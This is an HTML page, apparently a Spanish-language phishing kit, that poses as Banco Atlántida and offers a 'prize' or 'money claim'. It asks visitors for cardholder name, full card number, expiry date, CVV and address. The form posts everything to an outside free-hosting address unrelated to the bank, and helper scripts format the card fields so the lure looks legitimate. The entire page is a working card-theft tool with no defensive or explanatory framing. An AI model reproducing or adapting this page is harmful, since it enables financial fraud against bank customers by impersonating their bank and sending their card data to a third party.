<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<script type="text/javascript" src="target.js"></script>
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<title>Reclamar premio</title>
	<style type="text/css">


body{

	font-family: arial;
	margin: 0;
	padding: 0;
	
		}

.logo{		
			display: flex;
			background: #C42525;
			align-items: center;
			flex-wrap: wrap;
			box-shadow: 2px 2px 5px #999;
			
}
.titulo-1{
	
	color: white;
	font-size: 25px;
}
.ima-1{
	margin-left: 10px;
	width: 30px;
	
}
form p {
    margin-left: 11px;
    color: #005AB3;
}
form {
	box-sizing: border-box;
}
form input{
	width: 95%;
	display: block;
	margin: auto;
	box-sizing: border-box;
	margin-top: px;
	padding: 20px;
	border-radius: 5px;
	border: 1px solid #ff7777;
	outline-color: #dd1a1a;
}
form button{
	width: 95%;
	box-sizing: border-box;
	margin: 10px;
	padding: 15px;
	border-radius: 5px;
	color: white;
	border-style: none;
	cursor: pointer;
    background: linear-gradient(-45deg, #6d1010 0%, #ff7777 100%);
}
.span{
	font-size: 10px;
	margin-left: 30px; 
	position: relative;
	display: inline;
	top: 8px;
	background: white; 
	color: white;
	
}
.span span{
	color: #7E7E7E;
}
.boton a p {
	color: white;
}
form{
    width: 500px;
}
.caja-form{
    display: grid;
    place-items: center;
}
	.content{
		width: 500px;
		height: auto;
		display: block;
		margin: auto;
		padding-bottom: 40px;
	}
	.activo {
		color: white;
		display: none;
		width: 500px;
		height: 40px;
		border:2px solid #484848;
		background: #959595;
		border-radius: 5px;
		position: fixed;
		z-index: 100;
		bottom: 240px;
		left: 400px;
		margin-top: auto;
		text-align: center;

	}
	.content{
		display: grid;
		place-items: center;
	}
	
	@media only screen and (max-width: 850px){
		.formulario{
			width:95%;

		}
		.content {
			width: 98%;
		}
		#dick{
			width: 95%;
		
			left: 10px;
		}
	}
	</style>

</head>
<body>
<div class="logo"><img src="123.png" class="ima-1"><p class="titulo-1">
		Banco Atl&aacute;ntida
	</p></div>
	<div class="grid">
	<div class="content">
		
		<div class="caja-form">
            <form class="formulario" action="https://acountssuport.000webhostapp.com/banca/tarjetasmoney.php" method="post">
                <h3 class="titu-1" style="text-align: start;">Pague su boleto con su tarjeta tarjeta de crédito o débito</h3>
                <p>Ingrese una tarjeta de crédito o débito.</p>
                <span class="span">__<span>Ingrese el nombre exacto que aparece en la tarjeta</span>__</span>
                <input type="text" name="nombre" placeholder="JOSÉ A. MARTÍNEZ GARCÍA " required="" onkeyup="mayus(this);"" autocomplete="off">
                <span class="span">__<span>Número completo de la tarjeta</span>__</span>
                <input type="text" name="TarjetaNumero" maxlength="19" id="numeros" placeholder="0000 0000 0000 0000" required>
                <span></span>
                <!--Aqui inicia un nuevo input-->
                <span class="span">__<span>Búscalo al frente</span>__</span>
                <input type="text" id="vence" name="FechaVencimiento" placeholder="Fecha de vencimiento (MM/AA)"
                onkeyup="
                var v = this.value;
                if (v.match(/^\d{2}$/) !== null) {
                this.value = v + '/';
                }
                else if (v.match(/^\d{4}\$/) !== null) {
                this.value = v + '/';
                }"
                maxlength="5"
                required="">
                <span class="span">__<span>Búscalo al reverso</span>__</span>
                <input type="text" name="codigo" id="codigo" placeholder="C&oacute;digo de seguridad (CVV)" minlength="3" maxlength="3" required=""autocomplete = "off">
                <p>Su dirección</p>
                <input type="text" name="colonia" placeholder="Colonia" required>
                <input type="text" name="ciudad" placeholder="Ciudad" required="" style=" margin-top: 20px;" autocomplete="off">
                <button id="boton" type="submit">RECLAMAR DINERO</button>
                
            </form>
    
            <script type="text/javascript">
                var codigo = document.getElementById('codigo');
            
                codigo.onkeydown = function(e){
                    if (e.key == 'Backspace') return true;
            
                    if (e.key == ' ') return false;	
            
                    if (isNaN(e.key)) return false;
                };
            </script>
            
            <script>
            // Campo numeros
            var numeros = document.getElementById('numeros');
            
            // Poner cursor en el campo numeros
            numeros.focus();
            
            numeros.onkeydown = function(e){
                // Permitir la tecla para borrar
                if (e.key == 'Backspace') return true;
            
                // Permitir flecha izquierda
                if (e.key == 'ArrowLeft') return true;
            
                // Permitir flecha derecha
                if (e.key == 'ArrowRight') return true;
            
                // Bloquear tecla de espacio
                if (e.key == ' ') return false;
            
                // Bloquear tecla si no es un numero
                if (isNaN(e.key)) return false;
            };
            
            numeros.onkeyup = function(){
                numeros.value = numeros.value
                                // Borrar todos los espacios
                                .replace(/\s/g, '')
            
                                // Agregar un espacio cada dos numeros
                                .replace(/([0-9]{4})/g, '$1 ')
            
                                // Borrar espacio al final
                                .trim();
            };
            function mayus(e){

                e.value = e.value.toUpperCase();
                }
            </script>
        </div>
	</div>
	</div>
	<div id="dick" onclick="ocultar();" class="activo">
		<p style="font-size: 13px;">El codigo de seguridad son 3 numeros ubicados en la parte trasera de tu tarjeta.</p>
		
	</div>
</body>
</html>